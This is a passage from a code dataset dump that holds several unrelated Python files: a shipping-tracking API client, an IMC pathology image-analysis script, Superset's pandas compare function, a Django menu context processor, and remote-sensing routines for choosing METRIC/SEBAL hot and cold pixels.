(self.shipping.shipping_code, self.shipping_sn, resjson['message']))\n raise ShippingException(_(u'查询失败'))\n\n return resjson['data']\n\n\nclass ShippingAggreateTrackService(TrackService):\n \"\"\" 聚合数据物流查询 \"\"\"\n def __init__(self):\n TrackService.__init__(self)\n self.config_key = 'config_shipping_aggreate'\n self.apiurl = 'http://v.juhe.cn/exp/index'\n\n def _get_req_params(self):\n # 顺丰需要发件人或收件人手机号后4位\n receiverPhone = ''\n if self.shipping.aggreate_code == 'sf':\n if self.receive_phone is None:\n raise ShippingException(_(u'查询失败,缺少收件人手机号'))\n\n if len(self.receive_phone) < 11:\n raise ShippingException(_(u'查询失败,收件人手机号错误'))\n\n receiverPhone = self.receive_phone[-4:]\n log_info(u'[ShippingAggreateTrackService] [info] receiverPhone: %s' % receiverPhone)\n\n return {\n 'com': self.shipping.aggreate_code,\n 'no': self.shipping_sn,\n 'key': self.shipping_config['key'],\n 'dtype': 'json',\n 'receiverPhone': receiverPhone,\n }\n\n def track(self, shipping_id, shipping_sn, receive_phone=''):\n \"\"\"查询\"\"\"\n self.shipping_id = shipping_id\n self.shipping_sn = shipping_sn\n self.receive_phone = receive_phone\n try:\n res = self._get_track_response()\n except ShippingException as e:\n log_info(u'[ShippingAggreateTrackService] [Error] shipping_code:%s, shipping_sn:%s, ShippingException:%s' % (self.shipping.shipping_code, self.shipping_sn, e))\n raise e\n\n resjson = res.json()\n if resjson['error_code'] != 0 or not resjson['result']:\n log_info(u'[ShippingAggreateTrackService] [Error] shipping_code:%s, shipping_sn:%s, response error_code:%s' % (self.shipping.shipping_code, self.shipping_sn, resjson['error_code']))\n raise ShippingException(_(u'查询失败'))\n\n _track_list = resjson['result']['list']\n track_list = [{\n 'time': item['datetime'],\n 'ftime': item['datetime'],\n 'context': item['remark']\n } for item in _track_list]\n track_list.reverse()\n return track_list\n", "repo_name": "kapokcloud-inc/theonestore", "sub_path": "app/services/track.py", "file_name": "track.py", "file_ext": "py", "file_size_in_byte": 6888, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 12, "dataset": "github-code", "pt": "61", "api": [{"api_name": "app.models.sys.SysSetting.query.filter", "line_number": 18, "usage_type": "call"}, {"api_name": "app.models.sys.SysSetting.query", "line_number": 18, "usage_type": "attribute"}, {"api_name": "app.models.sys.SysSetting", "line_number": 18, "usage_type": "name"}, {"api_name": "app.models.sys.SysSetting.key", "line_number": 19, "usage_type": "attribute"}, {"api_name": "app.models.sys.SysSetting", "line_number": 19, "usage_type": "name"}, {"api_name": "app.exception.ShippingException", "line_number": 21, "usage_type": "call"}, {"api_name": "flask_babel.gettext", "line_number": 21, "usage_type": "call"}, {"api_name": "importlib.import_module", "line_number": 23, "usage_type": "call"}, {"api_name": "app.models.shipping.Shipping.query.get", "line_number": 54, "usage_type": "call"}, {"api_name": "app.models.shipping.Shipping.query", "line_number": 54, "usage_type": "attribute"}, {"api_name": "app.models.shipping.Shipping", "line_number": 54, "usage_type": "name"}, {"api_name": "app.exception.ShippingException", "line_number": 56, "usage_type": "call"}, {"api_name": "flask_babel.gettext", "line_number": 56, "usage_type": "call"}, {"api_name": "app.models.sys.SysSetting.query.filter", "line_number": 58, "usage_type": "call"}, {"api_name": "app.models.sys.SysSetting.query", "line_number": 58, "usage_type": "attribute"}, {"api_name": "app.models.sys.SysSetting", "line_number": 58, "usage_type": "name"}, {"api_name": "app.models.sys.SysSetting.key", "line_number": 59, "usage_type": "attribute"}, {"api_name": "app.models.sys.SysSetting", "line_number": 59, "usage_type": "name"}, {"api_name": "app.exception.ShippingException", "line_number": 61, "usage_type": "call"}, {"api_name": "flask_babel.gettext", "line_number": 61, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 63, "usage_type": "call"}, {"api_name": "app.exception.ShippingException", "line_number": 65, "usage_type": "call"}, {"api_name": "app.exception.ShippingException", "line_number": 74, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 78, "usage_type": "call"}, {"api_name": "app.helpers.log_info", "line_number": 80, "usage_type": "call"}, {"api_name": "app.exception.ShippingException", "line_number": 81, "usage_type": "call"}, {"api_name": "flask_babel.gettext", "line_number": 81, "usage_type": "call"}, {"api_name": "app.exception.ShippingException", "line_number": 85, "usage_type": "call"}, {"api_name": "app.exception.ShippingException", "line_number": 91, "usage_type": "call"}, {"api_name": "flask_babel.gettext", "line_number": 91, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 122, "usage_type": "call"}, {"api_name": "hashlib.md5", "line_number": 124, "usage_type": "call"}, {"api_name": "app.exception.ShippingException", "line_number": 140, "usage_type": "name"}, {"api_name": "app.helpers.log_info", "line_number": 141, "usage_type": "call"}, {"api_name": "app.helpers.log_info", "line_number": 146, "usage_type": "call"}, {"api_name": "app.exception.ShippingException", "line_number": 147, "usage_type": "call"}, {"api_name": "flask_babel.gettext", "line_number": 147, "usage_type": "call"}, {"api_name": "app.exception.ShippingException", "line_number": 164, "usage_type": "call"}, {"api_name": "flask_babel.gettext", "line_number": 164, "usage_type": "call"}, {"api_name": "app.exception.ShippingException", "line_number": 167, "usage_type": "call"}, {"api_name": "flask_babel.gettext", "line_number": 167, "usage_type": "call"}, {"api_name": "app.helpers.log_info", "line_number": 170, "usage_type": "call"}, {"api_name": "app.exception.ShippingException", "line_number": 187, "usage_type": "name"}, {"api_name": "app.helpers.log_info", "line_number": 188, "usage_type": "call"}, {"api_name": "app.helpers.log_info", "line_number": 193, "usage_type": "call"}, {"api_name": "app.exception.ShippingException", "line_number": 194, "usage_type": "call"}, {"api_name": "flask_babel.gettext", "line_number": 194, "usage_type": "call"}]} +{"seq_id": "39754656236", "text": "#!/usr/bin/env python\n\n\"\"\"\nImage level analysis of broad pathological features of IMC samples.\n\"\"\"\n\nimport typing as tp\n\nfrom tqdm import tqdm\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport skimage\nimport parmap\n\nfrom imc.types import Path, Array, DataFrame\nfrom imc.graphics import close_plots\n\nfrom src._config import prj, config\n\n\noutput_dir = (config.results_dir / \"pathology\").mkdir()\n\n\ndef main() -> int:\n\n # Lacunarity\n lac = quantify_lacunar_space()\n interpret_metric(lac, \"lacunarity\")\n\n # Fibrosis\n fib1 = score_marker(channel=\"ColTypeI(Tm169)\")\n interpret_metric(fib1, \"fibrosis_collagen\")\n\n fib2 = score_marker(channel=\"Periostin(Dy161)\")\n interpret_metric(fib2, \"fibrosis_periostin\")\n\n fib3 = score_marker(channel=\"CC16(Dy163)\")\n interpret_metric(fib3, \"CC16_bleeding\")\n # Check CC16 abundance only in airway ROIS\n score_compartment_specific(channel=\"CC16(Dy163)\")\n\n fib4 = score_marker(channel=\"CitH3(Sm154)\")\n interpret_metric(fib4, \"CitH3\")\n\n # Combine both\n # # weighted by the relative mean of the channels across images\n chs = [\"ColTypeI(Tm169)\", \"Periostin(Dy161)\"]\n metrics = pd.read_csv(\n config.results_dir / \"roi_channel_stats.csv\", index_col=[\"roi\", \"channel\"]\n )\n m = metrics.loc[:, chs, :].groupby(\"channel\")[\"mean\"].mean()\n r = m[chs[0]] / m[chs[1]]\n\n fib = pd.concat([fib1, fib2 * r]).groupby(level=0).mean()\n interpret_metric(fib, \"fibrosis_joint\")\n\n # Vessels\n # # (CD31, AQP1, aSMA, fill holes)\n\n return 0\n\n\ndef score_compartment_specific(\n channel: str = \"CC16(Dy163)\",\n attribute_name: str = \"CC16_bleeding_airways\",\n compartment: str = \"A\",\n compartment_name=\"airways\",\n):\n from src.analysis import get_domain_areas\n\n areas = get_domain_areas()\n\n f = output_dir / f\"extent_and_intensity.{channel}_quantification.csv\"\n if not f.exists():\n fib = score_marker(channel=channel)\n fib = pd.read_csv(f, index_col=0)\n\n interpret_metric(\n fib.loc[(areas[compartment] > 0)], f\"{attribute_name}_{compartment_name}\"\n )\n interpret_metric(\n fib.loc[(areas[compartment] == 0)], f\"{attribute_name}_non{compartment_name}\"\n )\n\n\ndef quantify_lacunar_space(overwrite: bool = False):\n f = output_dir / \"lacunarity.quantification.csv\"\n\n if not f.exists() or overwrite:\n _res = parmap.map(get_lacunae, prj.rois, pm_pbar=True)\n res = pd.DataFrame(\n [(x > 0).sum() for x in _res],\n index=[r.name for r in prj.rois],\n columns=[\"lacunar_space\"],\n )\n res[\"area\"] = [r.area for r in prj.rois]\n res[\"lacunar_fraction\"] = res[\"lacunar_space\"] / res[\"area\"]\n res.to_csv(f)\n res = pd.read_csv(f, index_col=0)\n\n return res\n\n\ndef score_marker(channel: str = \"ColTypeI(Tm169)\", overwrite: bool = False):\n f = output_dir / f\"extent_and_intensity.{channel}_quantification.csv\"\n\n if not f.exists() or overwrite:\n _res = parmap.map(get_extent_and_mean, prj.rois, marker=channel, pm_pbar=True)\n res = pd.DataFrame(\n _res, columns=[\"extent\", \"intensity\"], index=[r.name for r in prj.rois]\n )\n res[\"score\"] = res.apply(lambda x: (x - x.mean()) / x.std()).mean(1)\n res.to_csv(f)\n res = pd.read_csv(f, index_col=0)\n\n return res\n\n\n@close_plots\ndef interpret_metric(res: DataFrame, metric):\n\n # get mean per sample\n res_sample = (\n res.join(config.roi_attributes[\"sample\"])\n .groupby(\"sample\")\n .mean()\n .join(config.sample_attributes)\n )\n\n for attr in config.categorical_attributes:\n fig, stats = swarmboxenplot(\n data=res.join(config.roi_attributes),\n x=attr,\n y=res.columns,\n plot_kws=dict(palette=config.colors.get(attr)),\n )\n fig.savefig(\n output_dir / f\"{metric}.roi.by_{attr}.svg\",\n **config.figkws,\n )\n stats.to_csv(output_dir / f\"{metric}.roi.by_{attr}.csv\", index=False)\n\n fig, stats = swarmboxenplot(\n data=res_sample,\n x=attr,\n y=res.columns,\n plot_kws=dict(palette=config.colors.get(attr)),\n )\n fig.savefig(\n output_dir / f\"{metric}.sample.by_{attr}.svg\",\n **config.figkws,\n )\n stats.to_csv(output_dir / f\"{metric}.sample.by_{attr}.csv\", index=False)\n\n\ndef get_lacunae(\n roi: \"ROI\",\n selem_diam: int = 5,\n min_diam: int = 25,\n max_area_percentage: float = 50,\n fill_holes: bool = False,\n) -> Array:\n from csbdeep.utils import normalize\n import skimage as ski\n\n image = roi.stack[~roi.channel_exclude, ...]\n image = np.asarray([normalize(np.log1p(x)) for x in image]).mean(0)\n\n # threshold, close\n img = image > ski.filters.threshold_otsu(image)\n # img = image > ski.filters.threshold_multiotsu(image)[1]\n img = ski.morphology.binary_dilation(img, footprint=ski.morphology.disk(selem_diam))\n img = ski.morphology.closing(img, ski.morphology.disk(5))\n\n # clean up small objects inside\n if fill_holes:\n img = ~ndi.binary_fill_holes(~img)\n img = ~ski.morphology.remove_small_objects(~img, min_size=min_diam**2)\n\n lac = ndi.label(~img)[0]\n\n # remove objects too large\n remove = [\n i\n for i in np.unique(lac)\n if ((lac == i).sum() / img.size) * 100 > max_area_percentage\n ]\n if remove:\n for i in remove:\n lac[lac == i] = 0\n return lac\n fig, ax = plt.subplots()\n ax.imshow(image)\n ax.contour(lac, levels=3, cmap=\"Reds\")\n\n\ndef get_vessels(\n roi: \"ROI\",\n min_diam: int = 25,\n) -> Array:\n\n raise NotImplementedError\n\n from csbdeep.utils import normalize\n import skimage as ski\n\n image = roi._get_channel(\"AQ1\")[1]\n image = np.asarray([normalize(np.log1p(x)) for x in image]).mean(0)\n\n # threshold, close\n img = image > ski.filters.threshold_otsu(image)\n img = ski.morphology.remove_small_objects(img, min_size=min_diam**2)\n\n\ndef get_extent_and_mean(roi: \"ROI\", marker: str) -> tp.Tuple[float, float]:\n x = np.log1p(roi._get_channel(marker)[1].squeeze())\n area = np.multiply(*roi.shape[1:])\n mask = skimage.filters.gaussian(x, 2) > skimage.filters.threshold_otsu(x)\n return mask.sum() / area, x.mean()\n\n\nif __name__ == \"__main__\" and \"get_ipython\" not in locals():\n import sys\n\n try:\n sys.exit(main())\n except KeyboardInterrupt:\n sys.exit()\n", "repo_name": "ElementoLab/post-covid-imc", "sub_path": "src/pathology.py", "file_name": "pathology.py", "file_ext": "py", "file_size_in_byte": 6487, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "src._config.config.results_dir", "line_number": 22, "usage_type": "attribute"}, {"api_name": "src._config.config", "line_number": 22, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 49, "usage_type": "call"}, {"api_name": "src._config.config.results_dir", "line_number": 50, "usage_type": "attribute"}, {"api_name": "src._config.config", "line_number": 50, "usage_type": "name"}, {"api_name": "pandas.concat", "line_number": 55, "usage_type": "call"}, {"api_name": "src.analysis.get_domain_areas", "line_number": 72, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 77, "usage_type": "call"}, {"api_name": "parmap.map", "line_number": 91, "usage_type": "call"}, {"api_name": "src._config.prj.rois", "line_number": 91, "usage_type": "attribute"}, {"api_name": "src._config.prj", "line_number": 91, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 92, "usage_type": "call"}, {"api_name": "src._config.prj.rois", "line_number": 94, "usage_type": "attribute"}, {"api_name": "src._config.prj", "line_number": 94, "usage_type": "name"}, {"api_name": "src._config.prj.rois", "line_number": 97, "usage_type": "attribute"}, {"api_name": "src._config.prj", "line_number": 97, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 100, "usage_type": "call"}, {"api_name": "parmap.map", "line_number": 109, "usage_type": "call"}, {"api_name": "src._config.prj.rois", "line_number": 109, "usage_type": "attribute"}, {"api_name": "src._config.prj", "line_number": 109, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 110, "usage_type": "call"}, {"api_name": "src._config.prj.rois", "line_number": 111, "usage_type": "attribute"}, {"api_name": "src._config.prj", "line_number": 111, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 115, "usage_type": "call"}, {"api_name": "imc.types.DataFrame", "line_number": 121, "usage_type": "name"}, {"api_name": "src._config.config.roi_attributes", "line_number": 125, "usage_type": "attribute"}, {"api_name": "src._config.config", "line_number": 125, "usage_type": "name"}, {"api_name": "src._config.config.sample_attributes", "line_number": 128, "usage_type": "attribute"}, {"api_name": "src._config.config", "line_number": 128, "usage_type": "name"}, {"api_name": "src._config.config.categorical_attributes", "line_number": 131, "usage_type": "attribute"}, {"api_name": "src._config.config", "line_number": 131, "usage_type": "name"}, {"api_name": "src._config.config.roi_attributes", "line_number": 133, "usage_type": "attribute"}, {"api_name": "src._config.config", "line_number": 133, "usage_type": "name"}, {"api_name": "src._config.config.colors.get", "line_number": 136, "usage_type": "call"}, {"api_name": "src._config.config.colors", "line_number": 136, "usage_type": "attribute"}, {"api_name": "src._config.config", "line_number": 136, "usage_type": "name"}, {"api_name": "src._config.config.figkws", "line_number": 140, "usage_type": "attribute"}, {"api_name": "src._config.config", "line_number": 140, "usage_type": "name"}, {"api_name": "src._config.config.colors.get", "line_number": 148, "usage_type": "call"}, {"api_name": "src._config.config.colors", "line_number": 148, "usage_type": "attribute"}, {"api_name": "src._config.config", "line_number": 148, "usage_type": "name"}, {"api_name": "src._config.config.figkws", "line_number": 152, "usage_type": "attribute"}, {"api_name": "src._config.config", "line_number": 152, "usage_type": "name"}, {"api_name": "imc.graphics.close_plots", "line_number": 120, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 168, "usage_type": "call"}, {"api_name": "csbdeep.utils.normalize", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.log1p", "line_number": 168, "usage_type": "call"}, {"api_name": "skimage.filters.threshold_otsu", "line_number": 171, "usage_type": "call"}, {"api_name": "skimage.filters", "line_number": 171, "usage_type": "attribute"}, {"api_name": "skimage.morphology.binary_dilation", "line_number": 173, "usage_type": "call"}, {"api_name": "skimage.morphology", "line_number": 173, "usage_type": "attribute"}, {"api_name": "skimage.morphology.disk", "line_number": 173, "usage_type": "call"}, {"api_name": "skimage.morphology.closing", "line_number": 174, "usage_type": "call"}, {"api_name": "skimage.morphology", "line_number": 174, "usage_type": "attribute"}, {"api_name": "skimage.morphology.disk", "line_number": 174, "usage_type": "call"}, {"api_name": "skimage.morphology.remove_small_objects", "line_number": 179, "usage_type": "call"}, {"api_name": "skimage.morphology", "line_number": 179, "usage_type": "attribute"}, {"api_name": "numpy.unique", "line_number": 186, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 193, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 193, "usage_type": "name"}, {"api_name": "imc.types.Array", "line_number": 163, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 209, "usage_type": "call"}, {"api_name": "csbdeep.utils.normalize", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.log1p", "line_number": 209, "usage_type": "call"}, {"api_name": "skimage.filters.threshold_otsu", "line_number": 212, "usage_type": "call"}, {"api_name": "skimage.filters", "line_number": 212, "usage_type": "attribute"}, {"api_name": "skimage.morphology.remove_small_objects", "line_number": 213, "usage_type": "call"}, {"api_name": "skimage.morphology", "line_number": 213, "usage_type": "attribute"}, {"api_name": "imc.types.Array", "line_number": 201, "usage_type": "name"}, {"api_name": "numpy.log1p", "line_number": 217, "usage_type": "call"}, {"api_name": "numpy.multiply", "line_number": 218, "usage_type": "call"}, {"api_name": "skimage.filters.gaussian", "line_number": 219, "usage_type": "call"}, {"api_name": "skimage.filters", "line_number": 219, "usage_type": "attribute"}, {"api_name": "skimage.filters.threshold_otsu", "line_number": 219, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 216, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 227, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 229, "usage_type": "call"}]} +{"seq_id": "25168136555", "text": "from typing import Optional\n\nimport pandas as pd\nfrom flask_babel import gettext as _\nfrom pandas import DataFrame\n\nfrom superset.constants import PandasPostprocessingCompare\nfrom superset.exceptions import InvalidPostProcessingError\nfrom superset.utils.core import TIME_COMPARISON\nfrom superset.utils.pandas_postprocessing.utils import validate_column_args\n\n\n@validate_column_args(\"source_columns\", \"compare_columns\")\ndef compare( # pylint: disable=too-many-arguments\n df: DataFrame,\n source_columns: list[str],\n compare_columns: list[str],\n compare_type: PandasPostprocessingCompare,\n drop_original_columns: Optional[bool] = False,\n precision: Optional[int] = 4,\n) -> DataFrame:\n \"\"\"\n Calculate column-by-column changing for select columns.\n\n :param df: DataFrame on which the compare will be based.\n :param source_columns: Main query columns\n :param compare_columns: Columns being compared\n :param compare_type: Type of compare. Choice of `absolute`, `percentage` or `ratio`\n :param drop_original_columns: Whether to remove the source columns and\n compare columns.\n :param precision: Round a change rate to a variable number of decimal places.\n :return: DataFrame with compared columns.\n :raises InvalidPostProcessingError: If the request in incorrect.\n \"\"\"\n if len(source_columns) != len(compare_columns):\n raise InvalidPostProcessingError(\n _(\"`compare_columns` must have the same length as `source_columns`.\")\n )\n if compare_type not in tuple(PandasPostprocessingCompare):\n raise InvalidPostProcessingError(\n _(\"`compare_type` must be `difference`, `percentage` or `ratio`\")\n )\n if len(source_columns) == 0:\n return df\n\n for s_col, c_col in zip(source_columns, compare_columns):\n s_df = df.loc[:, [s_col]]\n s_df.rename(columns={s_col: \"__intermediate\"}, inplace=True)\n c_df = df.loc[:, [c_col]]\n c_df.rename(columns={c_col: \"__intermediate\"}, inplace=True)\n if compare_type == PandasPostprocessingCompare.DIFF:\n diff_df = s_df - c_df\n elif compare_type == PandasPostprocessingCompare.PCT:\n diff_df = ((s_df - c_df) / c_df).astype(float).round(precision)\n else:\n # compare_type == \"ratio\"\n diff_df = (s_df / c_df).astype(float).round(precision)\n\n diff_df.rename(\n columns={\n \"__intermediate\": TIME_COMPARISON.join([compare_type, s_col, c_col])\n },\n inplace=True,\n )\n df = pd.concat([df, diff_df], axis=1)\n\n if drop_original_columns:\n df = df.drop(source_columns + compare_columns, axis=1)\n return df\n", "repo_name": "apache/superset", "sub_path": "superset/utils/pandas_postprocessing/compare.py", "file_name": "compare.py", "file_ext": "py", "file_size_in_byte": 2711, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 55269, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pandas.DataFrame", "line_number": 15, "usage_type": "name"}, {"api_name": "superset.constants.PandasPostprocessingCompare", "line_number": 18, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 19, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 20, "usage_type": "name"}, {"api_name": "superset.exceptions.InvalidPostProcessingError", "line_number": 36, "usage_type": "call"}, {"api_name": "flask_babel.gettext", "line_number": 37, "usage_type": "call"}, {"api_name": "superset.constants.PandasPostprocessingCompare", "line_number": 39, "usage_type": "argument"}, {"api_name": "superset.exceptions.InvalidPostProcessingError", "line_number": 40, "usage_type": "call"}, {"api_name": "flask_babel.gettext", "line_number": 41, "usage_type": "call"}, {"api_name": "superset.constants.PandasPostprocessingCompare.DIFF", "line_number": 51, "usage_type": "attribute"}, {"api_name": "superset.constants.PandasPostprocessingCompare", "line_number": 51, "usage_type": "name"}, {"api_name": "superset.constants.PandasPostprocessingCompare.PCT", "line_number": 53, "usage_type": "attribute"}, {"api_name": "superset.constants.PandasPostprocessingCompare", "line_number": 53, "usage_type": "name"}, {"api_name": "superset.utils.core.TIME_COMPARISON.join", "line_number": 61, "usage_type": "call"}, {"api_name": "superset.utils.core.TIME_COMPARISON", "line_number": 61, "usage_type": "name"}, {"api_name": "pandas.concat", "line_number": 65, "usage_type": "call"}, {"api_name": "superset.utils.pandas_postprocessing.utils.validate_column_args", "line_number": 13, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 21, "usage_type": "name"}]} +{"seq_id": "38022710427", "text": "from django.urls import reverse\n\n\ndef menu(request):\n kwargs = {\n \"main_part_of_menu\": {\n \"title\": \"Джуманджи\",\n \"link\": \"/\"\n },\n \"parts_of_menu\": [\n {\n \"title\": \"Вакансии\",\n \"link\": reverse(\"vacancy_list\")\n },\n {\n \"title\": \"Компании\",\n \"link\": \"#\",\n },\n {\n \"title\": \"О проекте\",\n \"link\": \"#\"\n }\n ]\n }\n return kwargs\n\n\ndef navbar_username(request):\n if request.user.is_authenticated:\n username = request.user.username\n return {'username': username}\n return {'username': False}\n", "repo_name": "MVjimbo/djumandji", "sub_path": "app_catalog/context_processors.py", "file_name": "context_processors.py", "file_ext": "py", "file_size_in_byte": 745, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.urls.reverse", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "9878378300", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 28 18:56:06 2018\n\n@author: hector\n\"\"\"\n\n# import pyTVDI\nimport numpy as np\nfrom scipy.signal import convolve2d\n\nVI_SOIL = 0.0\nVI_FULL = 0.95\n \ndef maxmin_temperature(vi_array, lst_array, vi_lower_limit=None):\n lst_nan = np.isnan(lst_array)\n vi_nan = np.isnan(vi_array)\n if np.all(lst_nan) or np.all(vi_nan):\n print('No valid LST or VI pixels')\n return None, None\n\n if isinstance(vi_lower_limit, type(None)):\n vi_lower_limit = np.nanpercentile(vi_array, 0.05)\n\n #cold pixel\n lst = np.nanmin(lst_array[vi_array >= vi_lower_limit])\n cold_pixel = tuple(np.argwhere(lst_array == lst)[0])\n print('Cold pixel found with %s K and %s VI'%(float(lst_array[cold_pixel]),\n float(vi_array[cold_pixel])))\n #hot pixel\n lst = np.nanmax(lst_array[vi_array <= vi_lower_limit])\n hot_pixel = tuple(np.argwhere(lst_array == lst)[0])\n print('Hot pixel found with %s K and %s VI'%(float(lst_array[hot_pixel]),\n float(vi_array[hot_pixel])))\n \n return cold_pixel, hot_pixel\n\n\ndef cimec(vi_array,\n lst_array,\n albedo_array,\n sza_array,\n cv_ndvi,\n cv_lst,\n adjust_rainfall=False):\n ''' Finds the hot and cold pixel using the \n Calibration using Inverse Modelling at Extreme Conditios\n \n Parameters\n ----------\n ndvi_array : numpy array\n NDVI array (-)\n lst_array : numpy array\n Land Surface Temperature array (Kelvin)\n albedo : numpy array\n surface albedo\n sza : numpy array\n solar zenith angle (degrees)\n cv_lst : numpy array\n Coefficient of variation of LST as homogeneity measurement\n from neighboring pixels\n adjust_rainfall : None or tuple\n if tuple (rainfall_60, ETr_60) indicates that hot temperature\n will be adjusted based on previous 60 day cummulated rainfall and ET\n Returns\n -------\n cold_pixel : int or tuple\n \n hot_pixel : int or tuple\n \n References\n ----------\n .. [Allen2017] Allen, Richard G., Boyd Burnett, William Kramber, Justin Huntington, \n Jeppe Kjaersgaard, Ayse Kilic, Carlos Kelly, and Ricardo Trezza, 2013. \n Automated Calibration of the METRIC Landsat Evapotranspiration Process. \n Journal of the American Water Resources Association (JAWRA) .49(3):563–576\n https://doi.org/10.1111/jawr.12056\n '''\n lst_nan = np.isnan(lst_array)\n vi_nan = np.isnan(vi_array)\n if np.all(lst_nan) or np.all(vi_nan):\n print('No valid LST or VI pixels')\n return None, None\n\n#==============================================================================\n# # Cold pixel\n#==============================================================================\n # Step 1. Find the 5% top NDVI pixels\n ndvi_top = np.nanpercentile(vi_array, 95)\n ndvi_index = vi_array >= ndvi_top\n\n # Step 2. Identify the coldest 20% LST pixels from ndvi_index and compute their LST and NDVI mean value\n lst_low = np.nanpercentile(lst_array[ndvi_index], 20)\n lst_index = lst_array <= lst_low\n lst_cold = np.mean(lst_array[lst_index])\n \n # Step 3. Cold pixel candidates are within 0.2K from lst_cold \n #and albedo within 0.02% of albedo_thres\n beta = (90.0 - sza_array) # Solar elevation angle\n albedo_thres = 0.001343 * beta + 0.3281 * np.exp(-0.0188 * beta) # Eq. 7 in [Allen2017]_\n cold_pixel = np.logical_and.reduce((lst_index, \n np.abs(lst_array - lst_cold) <= 0.2, \n np.abs(albedo_array - albedo_thres) <= 0.02))\n \n # Step 5. From step 3 select the most homogeneous pixel based on its temperature\n cold_pixel = np.logical_and(cold_pixel,\n cv_lst == np.nanmin(cv_lst[cold_pixel]))\n \n cold_pixel = tuple(np.argwhere(cold_pixel)[0])\n print('Cold pixel found with %s K and %s VI'%(float(lst_array[cold_pixel]),\n float(vi_array[cold_pixel])))\n\n#==============================================================================\n# # Cold pixel\n#==============================================================================\n # Step 1. Find the 10% lowest NDVI \n ndvi_low = np.nanpercentile(vi_array, 10)\n ndvi_index = vi_array <= ndvi_low\n \n # Step 2. Identify the hotest 20% LST pixels from ndvi_index and compute their LST and NDVI mean value\n lst_high = np.nanpercentile(lst_array[ndvi_index], 80)\n lst_index = lst_array >= lst_high\n lst_hot = np.mean(lst_array[lst_index])\n \n if not isinstance(adjust_rainfall, bool):\n # Step 3. Adjust the average temperature based on 60 day rainfall and ETr\n lst_hot -= 2.6 - 13.0 * adjust_rainfall[0]/adjust_rainfall[1] # Eq. 8 in [Allen2017]..\n \n # Step 4. Hot pixel candidates are within 0.2K from lst_hot and has homogeneous NDVI\n hot_pixel = np.logical_and(lst_index, \n np.abs(lst_array - lst_hot) <= 0.2)\n \n hot_pixel = np.logical_and(hot_pixel,\n cv_ndvi == np.nanmin(cv_ndvi[hot_pixel]))\n\n hot_pixel = tuple(np.argwhere(hot_pixel)[0])\n print('Hot pixel found with %s K and %s VI'%(float(lst_array[hot_pixel]),\n float(vi_array[hot_pixel])))\n \n return cold_pixel, hot_pixel\n\n\ndef esa(vi_array,\n lst_array,\n cv_vi,\n std_lst,\n cv_albedo):\n ''' Finds the hot and cold pixel using the \n Exhaustive Search Algorithm\n \n Parameters\n ----------\n vi_array : numpy array\n Vegetation Index array (-)\n lst_array : numpy array\n Land Surface Temperature array (Kelvin)\n cv_ndvi : numpy array\n Coefficient of variation of Vegetation Index as homogeneity measurement\n from neighboring pixels\n std_lst : numpy array\n Standard deviation of LST as homogeneity measurement\n from neighboring pixels\n cv_albedo : numpy array\n Coefficient of variation of albdeo as homogeneity measurement\n from neighboring pixels\n\n Returns\n -------\n cold_pixel : int or tuple\n \n hot_pixel : int or tuple\n\n ETrF_cold : float \n \n ETrF_hot : float\n \n References\n ----------\n .. [Bhattarai2017] Nishan Bhattarai, Lindi J. Quackenbush, Jungho Im, \n Stephen B. Shaw, 2017.\n A new optimized algorithm for automating endmember pixel selection \n in the SEBAL and METRIC models.\n Remote Sensing of Environment, Volume 196, Pages 178-192,\n https://doi.org/10.1016/j.rse.2017.05.009.\n '''\n \n lst_nan = np.isnan(lst_array)\n vi_nan = np.isnan(vi_array)\n if np.all(lst_nan) or np.all(vi_nan):\n print('No valid LST or VI pixels')\n return None, None\n\n # Step 1. Find homogeneous pixels\n print('Filtering pixels by homgeneity')\n homogeneous = np.logical_and.reduce((cv_vi <= 0.25,\n cv_albedo <= 0.25,\n std_lst < 1.5))\n \n print('Found %s homogeneous pixels'%np.sum(homogeneous))\n if np.sum(homogeneous) == 0:\n return None, None\n \n # Step 2 Filter outliers by Building ndvi and lst histograms\n lst_min, lst_max, vi_min, vi_max = histogram_fiter(vi_array[~vi_nan],\n lst_array[~lst_nan]) \n\n print('Removing outliers by histogram')\n mask = np.logical_and.reduce((homogeneous,\n lst_array >= lst_min,\n lst_array <= lst_max,\n vi_array >= vi_min,\n vi_array <= vi_max))\n \n print('Keep %s pixels after outlier removal'%np.sum(mask))\n if np.sum(mask) == 0:\n return None, None\n\n # Step 3. Interative search of cold pixel\n print('Iterative search of candidate cold pixels')\n cold_pixels = incremental_search(vi_array, lst_array, mask, is_cold = True)\n print('Found %s candidate cold pixels'%np.sum(cold_pixels))\n if np.sum(cold_pixels) == 0:\n return None, None\n\n\n print('Iterative search of candidate hot pixels')\n hot_pixels = incremental_search(vi_array, lst_array, mask, is_cold = False) \n print('Found %s candidate hot pixels'%np.sum(hot_pixels))\n if np.sum(hot_pixels) == 0:\n return None, None\n\n\n # 